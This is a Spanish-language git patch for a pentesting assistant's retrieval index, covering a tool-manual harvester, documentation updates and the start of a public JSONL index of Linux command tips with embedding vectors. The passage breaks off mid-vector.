From 9fa0a40edff2b0be532129a9dfdf201194af4a10 Mon Sep 17 00:00:00 2001 From: sito Date: Sun, 16 Aug 2026 18:43:56 +0200 Subject: [PATCH] saber: manuales cosechados e indice publico pre-construido - manuales.py cosecha el --help de las herramientas que no traen man page (ffuf, sqlmap, suite impacket, netexec, hydra...) y lo escribe como markdown en conocimiento/09 - Manuales/. Es la referencia de opciones que la man page no da; complementa el cheatsheet de invocaciones comunes. - indexa.py --publico construye saber-publico.jsonl: glosario + pack de conocimiento con los vectores ya calculados, 100% publico y portable. - busca.py usa ese indice publico como fallback cuando no hay indice personal, asi un clon recien hecho consulta al instante sin reindexar nada. - .gitignore deja pasar saber-publico.jsonl; el personal (saber.jsonl) sigue fuera. - docs/rag.md y el README del pack documentan ambas cosas. --- .gitignore | 4 + docs/rag.md | 30 +- nucleo/datos/saber-publico.jsonl | 449 ++++++++++++++++++ nucleo/saber/busca.py | 19 +- .../conocimiento/09 - Manuales/gobuster.md | 35 ++ .../09 - Manuales/impacket-secretsdump.md | 89 ++++ .../09 - Manuales/impacket-wmiexec.md | 61 +++ .../conocimiento/09 - Manuales/netexec.md | 66 +++ .../conocimiento/09 - Manuales/nuclei.md | 249 ++++++++++ nucleo/saber/conocimiento/README.md | 9 + nucleo/saber/indexa.py | 101 ++-- nucleo/saber/manuales.py | 139 ++++++ 12 files changed, 1206 insertions(+), 45 deletions(-) create mode 100644 nucleo/datos/saber-publico.jsonl create mode 100644 nucleo/saber/conocimiento/09 - Manuales/gobuster.md create mode 100644 nucleo/saber/conocimiento/09 - Manuales/impacket-secretsdump.md create mode 100644 nucleo/saber/conocimiento/09 - Manuales/impacket-wmiexec.md create mode 100644 nucleo/saber/conocimiento/09 - Manuales/netexec.md create mode 100644 nucleo/saber/conocimiento/09 - Manuales/nuclei.md create mode 100644 nucleo/saber/manuales.py diff --git a/.gitignore b/.gitignore index 2799803..c699848 100644 --- a/.gitignore +++ b/.gitignore @@ -32,6 +32,10 @@ voz/comparativa/ # hacer el asistente, no son datos personales) !nucleo/datos/acciones.json !nucleo/datos/_generar.py +# Excepcion: el indice PUBLICO pre-construido (glosario + pack de conocimiento, +# con vectores ya calculados). Es 100 % publico y portable; se sube para que un +# clon consulte al instante sin reindexar. El personal (saber.jsonl) sigue fuera. +!nucleo/datos/saber-publico.jsonl # Registros y temporales *.log diff --git a/docs/rag.md b/docs/rag.md index 833b84d..91b8451 100644 --- a/docs/rag.md +++ b/docs/rag.md @@ -2,9 +2,12 @@ JARVIS responde desde los apuntes del usuario, no desde lo que el modelo recuerde. Para 668 herramientas de pentesting, recordar sería inventar. Este -documento explica el método y los resultados; el índice en sí no se publica -—contiene los apuntes, que son privados—, pero el código que lo construye sí -(`nucleo/saber/`). +documento explica el método y los resultados. El índice **personal** (los +apuntes de cada quien) no se publica; sí se publica un índice **público +pre-construido** —glosario de Linux más el pack de metodología y manuales, con +los vectores ya calculados (`nucleo/datos/saber-publico.jsonl`)— para que un clon +recién hecho consulte al instante, sin repetir el trabajo de indexar. El código +que lo construye está entero en `nucleo/saber/`. ## Cómo funciona @@ -85,17 +88,20 @@ forma de medirlo— sí está; el corpus lo pone cada quien con sus notas. | | En el repo | |---|---| -| El código: `indexa`, `busca`, `glosario`, `sistema`, `enriquece/` | **sí** | +| El código: `indexa`, `busca`, `glosario`, `sistema`, `manuales`, `enriquece/` | **sí** | | El eval (`enriquece/eval_set.jsonl`) | **sí** | | El glosario de tareas de Linux en castellano (`glosario.py`) | **sí** (genérico) | -| **El pack de metodología** (`saber/conocimiento/`, ~73 docs) | **sí** — limpio y genérico | -| El índice (`saber.jsonl`) y sus copias | **no** — los apuntes indexados | +| **El pack de metodología y manuales** (`saber/conocimiento/`) | **sí** — limpio y genérico | +| **El índice público pre-construido** (`datos/saber-publico.jsonl`) | **sí** — glosario + pack, con vectores | +| El índice personal (`saber.jsonl`) y sus copias | **no** — los apuntes indexados | | El diario (`diario.jsonl`) | **no** — las conversaciones | | Lo derivado (`cosecha.jsonl`, `sintesis.jsonl`) | **no** — salen de los apuntes | -Así que un equipo recién clonado, con `indexa.py`, construye un índice **útil sin -ningún dato privado**: las *man pages*, el glosario, y **el pack de metodología** -(`saber/conocimiento/`) —enumeración, explotación web, shells, privesc, Active -Directory, cheatsheets...— con los comandos de verdad. Son apuntes propios estilo -OSCP, scrubeados de hosts, credenciales y rutas. Los apuntes privados del usuario -(su `saber.jsonl`, su diario) siguen fuera; el pack los complementa. +Así que un equipo recién clonado consulta **al instante**, sin dato privado y sin +reindexar: el `saber-publico.jsonl` ya trae el glosario y el pack de metodología +—enumeración, explotación web, shells, privesc, Active Directory, cheatsheets— más +los **manuales** de las herramientas que no traen man page (`saber/conocimiento/09 +- Manuales/`, cosechados con `manuales.py` de su `--help`). Cuando quiera sumar sus +propias notas y las *man pages* de su máquina, corre `indexa.py` y pasa a usar su +índice personal. Los apuntes privados del usuario (su `saber.jsonl`, su diario) +siguen fuera; el pack los complementa. diff --git a/nucleo/datos/saber-publico.jsonl b/nucleo/datos/saber-publico.jsonl new file mode 100644 index 0000000..27be283 --- /dev/null +++ b/nucleo/datos/saber-publico.jsonl @@ -0,0 +1,449 @@ +{"tipo": "tarea", "herramienta": "chmod", "perfil": "LINUX", "fichero": "tarea comun: chmod", "texto": "Para cambiar los permisos de un fichero o carpeta: usa chmod. chmod 755 fichero (rwx dueño, rx resto). chmod +x da permiso de ejecucion.", "v": [0.14424, -0.18168, -0.07578, -0.01575, 0.10152, -0.10395, 0.01355, -0.011, -0.08246, -0.14669, -0.00531, -0.08353, 0.02113, -0.09113, 0.08923, -0.08978, -0.008, 0.15552, -0.05528, -0.07735, 0.00898, -0.04303, -0.03443, 0.01009, -0.07026, 0.0949, 0.11052, -0.05184, -0.08471, 0.03133, 0.20706, 0.04598, 0.15033, 0.1149, 0.02993, 0.06421, 0.13087, -0.12503, -0.06706, 0.05946, 0.08527, 0.06186, -0.15587, 0.04659, 0.11194, -0.12445, -0.00644, 0.06225, 0.00591, 0.08777, 0.07089, -0.09013, -0.0875, -0.05293, 0.1185, 0.03863, 0.2192, -0.07081, -0.02877, 0.06302, 0.02138, 0.08875, -0.0088, 0.07648, -0.00495, 0.02503, 0.01595, 0.01039, -0.05378, -0.05467, -0.14513, -0.00255, 0.05782, -0.00279, -0.04061, -0.09729, 0.02003, -0.20414, -0.03844, 0.03156, -0.02353, 0.02727, -0.12307, -0.01186, -0.03039, -0.0565, -0.03032, -0.1316, 0.0249, 0.00668, 0.05203, -0.02353, 0.03071, 0.011, 0.09555, -0.05243, -0.01208, 0.06962, -0.09424, -0.03557, 0.00015, 0.05933, -0.0984, 0.05728, -0.0394, 0.00962, 0.09891, -0.04238, -0.03965, 0.03381, 0.12484, -0.02889, 0.08522, 0.07666, -0.00748, -0.03841, 0.01505, -0.03866, 0.00597, -0.09621, -0.05892, 0.00572, -0.06405, 0.15837, 0.05373, -0.04568, -0.00718, 0.09199, 0.00514, -0.05726, -0.02462, -0.00128, 0.02165, -0.02193, -0.03088, 0.10668, -0.00824, 0.06943, -0.06392, -0.01969, 0.06801, 0.0727, 0.02525, 0.09699, 0.03896, 0.07632, 0.01377, 0.00353, -0.00385, -0.04557, 0.02218, 0.02149, 0.02737, 0.01272, 0.02297, 0.11775, 0.01783, -0.04064, -0.00058, 0.02966, 0.00734, 0.05552, -0.04156, 0.07411, 0.0192, 0.0404, -0.0161, 0.01694, 0.01603, 0.04332, -0.04205, 0.00938, 0.00322, -0.05596, 0.02681, 0.0019, -0.02064, -0.05176, 0.03946, 0.02829, 0.04418, -0.02349, -0.01407, 0.02137, -0.04274, 0.02486, 0.03135, -0.00694, -0.02018, -0.02467, -0.00189, 0.0761, -0.03352, -0.05094, 0.02149, -0.00588, -0.01456, -0.00531, -0.02638, 0.02579, -0.01973, 0.04222, -0.00239, -0.07264, 0.03339, -0.03669, 0.01267, -0.00178, -0.05147, -0.06949, -0.04301, -0.01635, 0.03993, -0.00299, -0.06397, 0.03613, -0.03182, 0.05172, 0.02889, -0.06163, -0.02126, 0.02068, 0.0436, -0.04147, 0.06119, 0.00838, 0.04722, -0.02822, -0.01831, 0.03641, -0.02372, 0.0224, 0.04346, 0.00204, 0.0393, -0.02303, 0.01189, 0.01487, -0.0153, -0.03486, 0.02968, 0.04079, -0.02812, -0.02915, 0.0292, -0.00401, -0.02953, 0.0311, 0.05671, -0.02878, 0.00159, -0.02413, -0.02464, -0.05654, -0.00717, 0.02221]} +{"tipo": "tarea", "herramienta": "chown", "perfil": "LINUX", "fichero": "tarea comun: chown", "texto": "Para cambiar el dueño de un fichero: usa chown. chown usuario:grupo fichero. Con -R para una carpeta entera.", "v": [0.20363, -0.13144, -0.04704, 0.0106, 0.0738, -0.15923, 0.04126, 0.04636, -0.01575, -0.12367, -0.02942, -0.0847, -0.10457, -0.04744, -0.0203, -0.07355, 0.02453, 0.09892, 0.02461, -0.07864, -0.11279, 0.07676, 0.0187, -0.01237, -0.07805, -0.01012, 0.06002, -0.01451, 0.0022, 0.10154, 0.24936, 0.09284, 0.14746, 0.09218, 0.0106, -0.00951, 0.11027, -0.11598, -0.0168, 0.11727, 0.09192, 0.07827, -0.20555, 0.14869, 0.02317, -0.03847, -0.01952, -0.03887, 0.03543, 0.21067, 0.10748, -0.06898, -0.10373, -0.03438, -0.03616, -0.05873, 0.12106, -0.09699, 0.04701, 0.05001, -0.0287, 0.04102, -0.001, 0.14549, -0.01626, 0.00417, -0.02661, -0.04277, -0.02454, -0.02984, -0.00236, -0.0087, 0.06269, 0.00211, -0.01658, -0.02711, 0.04552, -0.13106, -0.03127, 0.04334, -0.03198, -0.05054, -0.05788, -0.05616, -0.03458, -0.10191, 0.0906, -0.07377, 0.00108, 0.0266, 0.0647, -0.01451, 0.01469, 0.00126, 0.08039, -0.02581, -0.01423, 0.01424, -0.09087, -0.07438, 0.04457, 0.03332, -0.06164, 0.11008, -0.04538, 0.0426, -0.00368, -0.02392, -0.03718, -0.05781, 0.1234, 0.01412, 0.08717, 0.06435, -0.01428, 0.03748, -0.04058, 0.03409, -0.01245, -0.09199, -0.08806, 0.01629, -0.1226, 0.13342, 0.05177, -0.0121, 0.02617, 0.09492, -0.02896, 0.03789, -0.09127, 0.07142, -0.07808, 0.0204, -0.0079, 0.08198, -0.03488, 0.00631, -0.01197, -0.01432, 0.02482, 0.08672, -0.02084, 0.09289, 0.06138, 0.05427, 0.02562, -0.00094, -0.01763, 0.03634, 0.03894, 0.01655, -0.03798, -0.03055, 0.02833, -0.00862, 0.0326, -0.06347, 0.04361, -0.03623, 0.05582, -0.04051, 0.04509, -0.02029, -0.03225, -0.02037, -0.06792, 0.00471, 0.05422, 0.03153, -0.04841, 0.00208, 0.0338, -0.02671, -0.00163, -0.00137, -0.0104, 0.01919, 0.0458, 0.07247, 0.02808, -0.05949, 0.04431, 0.0531, -0.05516, -0.01289, -0.01907, 0.04807, 0.00061, -0.06445, -0.03155, 0.08169, 0.00506, -0.02542, -0.01736, -0.04055, -0.02114, -0.02811, -0.02575, -0.00409, -0.05166, 0.00607, 0.00215, -0.00756, -0.00455, 0.00708, 0.01436, 0.02346, -0.02892, -0.03508, -0.01097, 0.03062, 0.05675, 0.01077, -0.05047, 0.01536, 0.00182, 0.11862, 0.03319, 0.02663, -0.02417, 0.11042, 0.04315, -0.02193, 0.04857, 0.04396, -0.00554, -0.07412, -0.04513, 0.01949, -0.01434, 0.00149, 0.06388, -0.0126, 0.04642, 0.00455, 0.05187, -0.01844, -0.01537, -0.00566, -0.02407, 0.02081, -0.06319, 0.01022, 0.05044, 0.02444, -0.10855, 0.01241, 0.02873, -0.09235, -0.01137, -0.03352, 0.00895, -0.08588, -0.00761, 0.00335]} +{"tipo": "tarea", "herramienta": "tar", "perfil": "LINUX", "fichero": "tarea comun: tar", "texto": "Para comprimir una carpeta en un archivo: usa tar. tar czf archivo.tar.gz carpeta/ comprime. tar xzf archivo.tar.gz extrae.", "v": [0.17692, -0.22977, -0.00498, -0.07703, 0.06463, -0.12541, 0.15758, 0.04567, -0.03046, 0.08146, -0.08305, -0.06189, -0.02826, 0.07426, 0.00125, -0.00463, 0.09767, 0.01706, 0.13491, -0.04509, 0.0917, 0.16964, 0.00315, -0.19772, -0.14161, -0.05053, -0.01345, -0.05712, -0.20804, 0.00262, -0.03385, 0.05121, 0.02381, -0.00144, -0.03778, 0.1226, 0.11013, -0.00669, -0.12448, 0.06627, 0.08757, 0.07746, -0.1231, 0.15115, -0.06958, -0.02474, 0.06886, 0.03462, 0.02334, -0.01434, 0.00623, -0.05268, 0.05523, 0.02455, -0.04874, -0.09613, -0.04962, -0.13394, -0.04311, 0.10239, 0.05416, 0.04845, -0.03458, -0.01703, -0.04469, -0.07856, 0.01297, 0.03524, -0.20147, -0.00678, -0.07637, 0.09892, 0.12371, -0.10104, -0.03973, -0.03049, -0.0385, -0.13223, -0.12815, 0.06423, 0.02135, -0.02424, -0.05036, -0.01809, -0.09867, -0.10237, -0.01096, 0.00314, 0.02928, -0.01381, 0.02201, -0.00788, -0.08411, 0.02052, 0.08821, -0.10609, -0.05188, -0.01758, 0.08078, 0.00169, 0.00987, 0.02162, -0.03221, 0.08346, 0.03262, -0.01791, -0.06038, 0.01912, -0.0534, -0.0252, 0.08841, 0.02386, 0.12825, 0.08886, -0.07062, -0.03376, -0.03637, -0.03471, -0.01697, -0.01992, -0.02929, -0.04842, -0.03881, 0.03796, -0.04624, -0.06353, 0.00474, 0.06621, -0.07436, -0.01233, -0.04057, 0.0108, -0.05194, -0.02136, -0.034, 0.03426, 0.01952, 0.05183, -0.03863, -0.08893, 0.09783, -0.0307, 0.00419, 0.12384, 0.0631, -0.00322, -0.02351, -0.00629, -0.01235, -0.05286, 0.04682, -0.01013, 0.01903, -0.06407, 0.03518, 0.05405, 0.03138, -0.06567, -0.03318, -0.0757, 0.01529, -0.03323, -0.01648, 0.02755, -0.01407, -0.04049, 0.01179, 0.06403, -0.02166, -0.01817, 0.02078, -0.01848, -0.00618, -0.09866, -0.02388, -0.01812, 0.01118, -0.06885, 0.05569, 0.00775, 0.03165, -0.00768, 0.05408, 0.07322, -0.04797, -0.04797, 0.0551, 0.0063, -0.01387, -0.01089, 0.02438, 0.08225, -0.05801, 0.06535, 0.03018, 0.01091, -0.05439, -0.01493, -0.0668, 0.00123, -0.03924, 0.016, -0.03906, -0.00472, 0.03525, -0.04358, -0.03044, -0.01277, -0.04962, -0.00285, -0.00577, 0.06508, 0.01095, -0.02702, 0.01804, 0.01055, 0.01627, 0.05231, 0.02809, -0.03713, -0.05357, 0.04566, 0.06181, 0.00292, 0.0244, -0.0006, 0.03857, 0.00294, -0.04844, -0.0531, 0.05488, 0.06236, 0.00927, 0.0004, 0.0439, -0.02794, -0.0068, 0.03546, -0.01134, -0.06085, -0.04411, 0.01681, -0.04281, 0.00743, -0.02158, -0.00532, -0.0276, 0.03194, 0.02682, -0.04779, -0.01473, -0.06281, -0.00563, -0.01446, -0.0039, -0.00068]} +{"tipo": "tarea", "herramienta": "unzip", "perfil": "LINUX", "fichero": "tarea comun: unzip", "texto": "Para descomprimir un zip: usa unzip. unzip archivo.zip. Con -d carpeta para donde.", "v": [0.05348, -0.17243, -0.1797, -0.08814, 0.06809, -0.16543, -0.0451, 0.01357, -0.08398, 0.02066, 0.03285, -0.15783, -0.00289, 0.03795, 0.00989, -0.02889, 0.09239, 0.0987, 0.06985, -0.0713, 0.09051, 0.13834, 0.075, -0.11539, -0.09637, 0.05851, 0.05461, 0.00787, -0.20604, -0.03738, -0.0473, 0.03983, 0.03577, 0.04715, -0.05833, 0.14377, 0.19468, 0.00131, -0.09712, 0.08339, 0.0685, 0.16865, -0.13465, 0.13823, -0.08398, 0.08994, 0.0428, 0.00171, -0.01436, -0.0311, -0.06355, -0.05021, -0.01881, -0.01469, -0.089, -0.11694, -0.12422, -0.06141, 0.01, 0.0906, 0.06854, 0.1195, -0.00913, 0.03175, -0.03057, -0.07936, -0.03646, 0.00057, -0.16437, 0.06732, -0.02546, 0.13521, 0.07852, -0.11275, -0.06247, 0.05824, -0.09837, -0.1947, -0.06912, 0.03154, 0.05633, 0.04066, -0.1061, -0.02267, -0.04837, -0.09772, -0.02077, 0.03809, 0.05552, 0.01904, 0.06966, 0.05001, -0.08802, 0.11923, -0.00796, -0.14391, -0.09346, 0.05835, 0.01986, 0.06904, -0.0318, 0.02227, -0.09436, 0.08736, -0.00487, -0.0014, -0.01422, 0.06117, 0.02635, -0.02495, 0.10759, 0.05313, 0.05049, 0.0844, -0.09872, -0.10611, 0.03369, -0.02254, 0.05325, -0.02944, 0.0116, -0.03648, -0.05916, 0.06109, 0.00583, -0.05294, -0.01808, 0.01028, -0.00919, 0.01952, 0.01976, 0.00265, -0.07796, 0.03375, 0.05796, 0.0002, 0.05165, 0.00754, 0.0018, -0.06683, 0.03594, -0.04103, -0.01478, 0.06071, 0.0214, -0.01596, -0.01136, 0.00695, 0.02709, -0.02398, 0.06368, 0.0022, -0.00111, -0.07032, 0.05816, 0.00268, 0.0232, -0.05465, 0.02022, -0.04765, -0.04808, -0.01876, -0.01479, 0.00228, -0.0686, -0.00668, -0.01419, 0.04754, -0.00627, -0.01627, 0.01433, 0.01974, -0.01504, -0.05367, -0.01593, -0.00014, -0.03104, -0.0291, 0.0291, 0.00155, 0.02417, -0.03976, 0.04317, 0.04752, -0.08058, -0.01976, 0.07275, 0.01704, -0.02012, -0.00905, 0.01727, 0.03701, -0.03244, 0.03694, 0.00201, 0.0038, -0.02078, -0.02394, -0.06424, 0.02729, -0.06695, -0.01002, -0.02476, -0.00219, 0.02633, 0.03482, -0.00119, -0.02309, -0.04118, 0.0152, -0.01147, 0.04564, -0.00947, -0.02125, 0.01638, -0.036, 0.00254, 0.1175, 0.01209, -0.02274, 0.01472, 0.01324, 0.03025, 0.00103, 0.04333, 0.00243, 0.02073, 0.00437, -0.03918, -0.03599, -0.0033, 0.04215, 0.00557, -0.00228, -0.01065, -0.01158, -0.00598, 0.03108, -0.02675, -0.0146, -0.00985, 0.00983, -0.06121, 0.00029, -0.01577, 0.03536, -0.04165, 0.02565, 0.01319, -0.06623, -0.0218, -0.04627, 0.00567, -0.02411, 0.00419, -0.01115]} +{"tipo": "tarea", "herramienta": "grep", "perfil": "LINUX", "fichero": "tarea comun: grep", "texto": "Para buscar texto dentro de ficheros: usa grep. grep -r 'texto' carpeta/ busca en todo. grep -i ignora mayusculas.", "v": [0.09981, -0.2058, -0.17709, -0.08394, 0.0871, -0.1027, -0.01052, 0.06154, 0.0175, -0.03286, -0.10668, -0.01728, 0.0118, -0.08555, 0.11272, 0.04186, -0.02009, 0.12049, 0.04655, -0.01994, 0.00422, 0.02131, 0.00308, -0.09089, -0.22726, -0.08216, -0.0806, -0.05007, -0.0041, -0.10463, -0.02986, 0.0249, 0.01455, -0.14895, -0.15719, -0.04415, -0.00829, -0.03194, -0.04729, 0.04465, 0.01131, 0.15741, -0.16547, 0.01331, -0.07763, -0.17191, 0.0645, 0.0405, -0.15854, 0.08389, -0.02806, -0.05791, -0.09255, -0.08904, -0.16804, 0.12848, 0.11542, -0.03336, 0.0317, 0.05367, -0.00929, 0.02561, 0.00532, -0.03728, -0.03572, 0.0331, 0.16945, -0.09072, 0.00471, 0.09968, -0.06449, 0.08447, -0.00253, 0.01322, -0.05032, 0.08051, -0.06458, -0.10252, 0.07472, 0.08263, -0.00157, -0.00278, -0.12013, -0.02769, -0.00886, -0.10542, 0.0114, 0.04119, -0.08195, -0.00481, 0.07118, -0.02126, -0.05395, 0.06727, -0.03415, 0.01036, -0.03524, -0.01985, -0.02543, 0.04104, 0.00928, -0.08597, -0.08863, 0.04976, 0.0037, -0.01363, -0.01377, 0.15115, 0.02463, -0.03066, 0.0846, 0.03118, -0.03082, 0.052, 0.03162, 0.00645, 0.01729, 0.09473, 0.01528, -0.05058, -0.08746, 0.0105, -0.06212, 0.01508, 0.07509, -0.0117, 0.04452, 0.02879, 0.06214, 0.07918, -0.07268, 0.02177, -0.08841, -0.06123, 0.02521, -0.03058, 0.00239, 0.04511, 0.06645, -0.0034, -0.0336, -0.00798, -0.05802, 0.06149, -0.03248, -0.04651, 0.09536, 0.03059, 0.02647, -0.08864, -0.0333, -0.09448, -0.07087, -0.0205, 0.07541, -0.01848, 0.05969, -0.06011, -0.06961, -0.09249, -0.03624, -0.0129, -0.03752, 0.03171, -0.00884, 0.06861, -0.04739, -0.0406, 0.0314, 0.04878, 0.01441, -0.04146, -0.01682, -0.03225, 0.0325, 0.05882, 0.04128, 0.03035, 0.01335, 0.00497, 0.0643, -0.02159, 0.00502, 0.0583, -0.03955, -0.00347, 0.08262, 0.02531, -0.04737, -0.04321, -0.00076, 0.03582, 0.00961, 0.05011, -0.02271, 0.0287, 0.04234, 0.00938, 0.00921, 0.01556, -0.0817, -0.04424, 0.01691, -0.01105, 0.0393, -0.03194, -0.02991, -0.0556, -0.01594, 0.0105, 0.06539, 0.05772, 0.00464, -0.0, -0.02638, -0.07057, -0.05164, 0.04199, 0.03906, -0.00043, -0.01903, 0.02819, 0.05873, 0.0338, -0.00133, 0.04561, -0.02035, -0.02315, -0.01744, -0.00609, -0.02102, -0.0299, -0.02057, -0.00618, -0.02845, -0.04529, 0.01094, -0.01645, -0.02066, 0.00214, 0.00285, -0.01129, -0.06698, 0.00965, -0.04051, 0.03086, -0.07302, 0.03679, -0.01103, -0.05523, -0.00169, -0.05982, -0.0214, -0.05389, 0.06767, -0.02484]} +{"tipo": "tarea", "herramienta": "find", "perfil": "LINUX", "fichero": "tarea comun: find", "texto": "Para buscar ficheros por nombre: usa find. find /ruta -name '*.txt' busca por nombre. -type f solo ficheros.", "v": [0.08169, -0.03725, -0.16122, -0.04886, 0.13466, -0.1513, -0.00075, -0.088, -0.01095, -0.04994, 0.00862, -0.09207, 0.04899, -0.04646, 0.1436, -0.10807, 0.01441, -0.013, 0.08089, -0.09749, -0.04546, -0.02133, -0.05922, 0.01834, -0.12364, -0.12998, 0.03993, -0.08466, -0.06909, -0.01479, 0.20104, 0.01495, 0.11022, -0.00792, -0.0681, 0.04241, 0.09215, -0.12353, -0.04306, 0.00792, 0.0695, 0.14363, -0.15379, 0.10184, -0.10878, -0.07882, -0.11161, 0.03774, 0.03985, -0.05686, 0.08978, -0.06405, -0.03423, 0.04682, -0.0291, -0.06209, 0.12778, 0.00693, -0.11061, 0.09025, -0.06476, -0.04969, 0.03393, 0.01934, -0.00322, -0.04637, 0.1832, -0.05926, -0.0418, -0.08268, 0.00134, 0.07133, -0.02736, -0.06036, 0.00904, 0.06202, 0.05398, -0.04168, 0.09313, -0.01318, -0.0259, -0.06105, -0.17449, -0.04835, -0.02213, -0.05448, 0.15283, 0.04033, -0.05034, -0.04758, 0.0803, 0.00923, -0.03203, 0.11703, -0.00705, 0.06769, 0.04594, 0.01302, -0.03916, -0.03381, -0.01846, 0.05399, -0.02965, 0.10562, -0.00369, -0.02387, 0.00503, 0.00557, -0.02497, 0.00598, 0.06645, -0.03756, 0.0245, 0.00028, -0.00462, -0.03738, -0.01276, 0.00126, 0.02383, -0.13366, -0.09451, -0.00888, -0.0803, 0.05695, 0.00579, -0.05226, -0.03377, -0.01726, -0.00546, 0.01398, 0.03674, 0.03467, -0.13182, -0.11946, -0.02345, 0.05158, 0.00867, 0.09837, 0.05559, -0.02442, 0.04418, 0.02964, -0.08088, 0.01585, 0.06051, 0.00068, 0.02958, -0.02941, -0.01817, -0.07741, -0.05483, 0.0564, 0.01847, 0.04832, 0.01167, 0.04937, 0.00275, -0.07043, -0.02409, -0.01156, 0.03178, 0.08366, -0.04222, -0.03272, -0.01437, -0.00568, 0.01215, -0.03803, 0.08337, -0.05038, -0.06705, 0.03686, -0.00203, -0.11342, 0.04368, -0.00351, -0.03039, -0.05484, 0.02566, 0.03118, -0.00657, -0.0469, 0.01483, 0.05308, -0.10276, -0.07215, 0.06362, -0.01028, -0.0156, -0.0112, 0.02079, 0.06502, -0.05218, -0.03166, -0.08183, 0.03751, 0.03175, -0.0448, 0.02073, -0.04153, -0.01182, -0.05601, -0.01227, -0.05843, -0.00326, -0.00909, -0.02521, -0.01046, -0.00198, -0.03599, 0.04504, 0.00116, 0.06736, -0.03083, -0.05847, -0.03041, -0.01917, 0.03965, 0.03024, 0.02232, -0.07689, 0.08721, 0.07179, 0.00026, 0.03003, 0.01906, 0.06763, -0.07955, -0.03311, 0.05485, -0.02003, 0.0645, -0.01619, -0.04221, 0.10295, 0.00162, -0.00715, -0.0131, -0.03438, -0.01091, 0.00826, 0.02695, -0.05262, -0.00561, -0.03831, -0.05665, -0.09559, 0.07972, 0.04227, -0.07357, -0.05764, 0.02293, 0.0044, 0.01241, 0.04771, -0.09734]} +{"tipo": "tarea", "herramienta": "ss", "perfil": "LINUX", "fichero": "tarea comun: ss", "texto": "Para ver los puertos abiertos en escucha: usa ss. ss -tlnp lista los puertos TCP en escucha con su proceso.", "v": [0.11513, -0.06703, -0.18687, -0.06869, 0.03455, -0.16194, 0.23118, -0.07257, -0.017, 0.03384, -0.09765, 0.11189, 0.15046, 0.0405, -0.10044, -0.10913, -0.03509, 0.09947, 0.14692, -0.01313, -0.06682, 0.0172, -0.12444, -0.07003, 0.04629, 0.03992, 0.00284, -0.10384, -0.07679, 0.022, 0.00238, 0.03327, 0.07202, 0.01353, 0.06404, -0.06673, -0.00588, 0.04767, 0.11032, 0.15002, 0.04784, 0.11551, -0.05258, -0.03155, 0.1252, -0.10886, -0.02347, -0.02416, 0.05252, 0.002, -0.03327, 0.07902, -0.14755, 0.06275, -0.01764, 0.03784, -0.02436, 0.00723, 0.00413, -0.07414, -0.09273, 0.08992, 0.02446, -0.13268, -0.03204, -0.05678, 0.00505, 0.01367, -0.03934, 0.04799, -0.11302, -0.02615, -0.00175, 0.04566, 0.02498, -0.06258, -0.04496, -0.04133, 0.04669, 0.08114, 0.04602, -0.0567, 0.00401, -0.07206, -0.05526, 0.01019, -0.07017, 0.04116, 0.01437, -0.03295, 0.00882, 0.00206, -0.02651, 0.13073, 0.04278, -0.0395, -0.10277, 0.08694, -0.00524, 0.02536, 0.10803, 0.07508, 0.00991, 0.03963, -0.03086, 0.01328, 0.04921, -0.1111, 0.08273, 0.03131, 0.11026, 0.05706, -0.02373, -0.04336, -0.06276, -0.03314, -0.0456, -0.11061, 0.02185, 0.05103, 0.02012, -0.02966, -0.02581, 0.01668, -0.05384, -0.03175, 0.01979, 0.05445, 0.05647, 0.03473, 0.07062, 0.01879, -0.05366, -0.10508, -0.00766, -0.11898, -0.03985, -0.0561, -0.00895, -0.03668, -0.03757, 0.08989, -0.07645, 0.03197, 0.0591, -0.00773, 0.00932, -0.00285, -0.02934, -0.04541, 0.03841, 0.02363, -0.04479, -0.08405, 0.00078, 0.03698, 0.09724, -0.09011, -0.0288, 0.03397, -0.00193, 0.04011, -0.0617, -0.03406, 0.0206, -0.04019, -0.02445, 0.03869, 0.01014, -0.12096, -0.00578, 0.02094, -0.00477, -0.08719, -0.03155, -0.03337, -0.03237, -0.03927, -0.04208, 0.0213, -0.08727, 0.04555, -0.06718, -0.08338, -0.08859, -0.06716, 0.02773, -0.11132, -0.04345, 0.06121, -0.00322, 0.00019, -0.0359, 0.00308, 0.03325, 0.03296, 0.03226, -0.00703, -0.12399, -0.01464, -0.00192, 0.02187, 0.05123, -0.06729, 0.03495, 0.06793, -0.01806, 0.07571, 0.02148, 0.07149, 0.02744, -0.01979, -0.03681, 0.03619, -0.0519, 0.02845, -0.09965, 0.06856, -0.01314, 0.11261, -0.0858, 0.06017, -0.00129, 0.06703, -0.01569, 0.01081, 0.0465, 0.03046, 0.06458, 0.05554, -0.03303, 0.04498, 0.00569, -0.02529, -0.03654, 0.04198, -0.08524, -0.00298, -0.04988, -0.01899, 0.01688, -0.02127, -0.00384, -0.01119, 0.03038, -0.0431, -0.01611, 0.01752, 0.02663, -0.04451, -0.07128, 0.0265, -0.01969, -0.0598, 0.04097, -0.02628]} +{"tipo": "tarea", "herramienta": "top", "perfil": "LINUX", "fichero": "tarea comun: top", "texto": "Para ver que procesos consumen mas: usa top. top o htop en tiempo real. ps aux --sort=-%cpu para una foto.", "v": [0.11057, -0.01819, -0.08128, 0.0061, -0.00444, -0.23294, 0.05756, -0.08192, 0.06328, -0.08699, -0.21527, -0.04389, 0.03758, 0.09917, -0.08091, -0.12545, -0.04834, 0.07154, 0.10239, 0.01094, -0.00092, -0.04722, -0.18144, -0.1657, 0.03206, 0.07581, 0.06734, -0.01782, -0.15343, 0.06395, 0.05259, -0.01897, -0.00817, -0.08181, -0.19991, -0.11092, 0.00751, 0.04262, -0.01041, 0.13644, 0.00762, 0.10598, -0.0128, 0.0493, 0.02173, -0.0565, -0.03782, -0.03196, -0.01731, -0.05353, -0.01572, 0.09218, -0.02385, 0.11602, -0.08769, -0.00669, -0.13215, -0.06147, 0.00402, -0.10316, -0.07535, 0.11475, -0.02502, -0.00561, -0.01574, 0.0948, -0.05585, -0.04138, 0.0461, 0.01673, -0.07622, 0.02787, 0.09849, -0.07126, 0.11805, -0.04009, 0.03213, -0.02271, 0.0038, -0.00171, 0.02838, -0.08509, -0.16531, 0.03044, -0.14802, -0.09027, 0.00543, 0.03156, -0.03272, 0.03709, -0.01953, 0.05472, 0.04524, -0.01231, 0.05544, 0.02047, -0.06667, -0.02589, 0.00766, 0.14166, 0.07021, -0.0329, -0.03793, 0.01242, -0.02041, -0.0399, 0.0746, -0.01472, -0.04616, -0.04418, 0.0492, -0.02862, -0.1228, -0.00205, -0.07447, -0.00713, -0.06336, -0.06378, -0.04436, -0.03706, -0.02693, 0.05966, -0.06388, -0.04848, 0.03518, 0.02406, -0.02896, 